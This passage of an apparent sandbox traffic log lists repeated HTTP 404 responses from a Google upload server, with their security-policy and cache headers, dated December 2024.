NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY; expires=Tue, 17-Jun-2025 16:57:44 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4RiefLl7qtWaDPETfzM1yTb_9B2r_CaWGLI2NqmfUnyR6mkUk2LA-fv-MfJwtxQE-AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:50 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-i4SZdSRTxK8HNjMx0AacNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5T54kqLTEwunHgUPdaz6pUFI6X0YMkjxC5u4osWLlhWlHDDjC9O9ycICCF7yT4TGgBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-t9AKfqNhO7sj8GIw9ym2EA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4vVjoIim0YxDVexvmkjvQhK_A4gqJrul5voHTdbvq5TMtaCfuehoNascKx_5m3Rz-aContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-xAPF-d_0sRNahErAT3pozQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ta_CaXtC6lLUGYMlr04C777LnIJVsBez3oHI8R02QCpL_I_bw84ygkOOCzszDTKFoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-WU6cB3O4QjibIAQpY59wuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC79_XdwT5opJ7bv4SRS37aV6-L-mz42raFK0BeUYM8LjL7jm78EHlmU9VntEIdrP7CcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:12 GMTContent-Security-Policy: script-src 'nonce-_xJZkHHIdz5WlfP4Ganjkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5lQPyB7BU66PM55OBj_X1vNiIetanHmA_JKuIcORGptSgHDW3qjNXQLp3lOXEUkgVCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-B6wP_cAUUif2MF-q9-axJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gplIk9aWtG2OizbMSZcYAmX3WVFDwhzKVatQHPnAMmpshVwSPhaPN4dm47Ju49C0uContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:23 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-CpXKikGZJSW4-Nslu1zAIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yshGBTP9KYwDoCluf2c407DFNsdUYXeuPHVLetEdD71YMf886mgV2_nGeWrbN7AZtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:29 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-IRKCx1nAUszw3Y4rLk3B_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5y9Ls_0uWWG4a_qMg6miJaPIx57RaysFJKrU2LgzOhrfRGfCBussr-xIAURga4DwxRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-kdrDnV6r3_lplXIAfzZ4HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5kLglCmpi1M1uiYUtow5_xWVCFWt-dnI8y-hYx_XhV6FjvMrXJU7gxxu_s02NRgSw0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-IKqxiRuJi9j75EgjhG78mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ySmzlUQfiaa6_KDXJESL2cDQjTswUyr6T0y8HWTZE2E7G7ojaLZkjquJ_AvCFNKoGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4wdzbC-IeVjHfY9zt4ovsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4jSESVVtciyM1x2PPtN-ZBJgeonaSh7COd5VA-a5cO-_NnXpuQA9_MZ7M8kAz8gLlsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:51 GMTContent-Security-Policy: script-src 'nonce-n2sQLDlgYCtFP5QmtjCrLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cw1ma4l2OPdRW8fIHKqb0UyXyALYjuHmlKrtbbgEgLdzGSuFI2krHbmmYQfbeKo3_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-tyiYeSxCHk1zei-kV--uFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KZ4odGlUd1G_LJyB_j53JW4-iYxCcwcMKaPELOkFSjyzfEAX-yHOXM8hP6LQLQMTSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-ywuEZEngkIzpTJnY2xpr8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bP9KYGOA7GuGR_z2HfohlK_Nb9MWv3lb-qxFTmX8aVCz35umiZkK_ZloBPAE-5b8xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:07 GMTContent-Security-Policy: script-src 'nonce-zEulElOHZOtj3UQvRdyyUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, 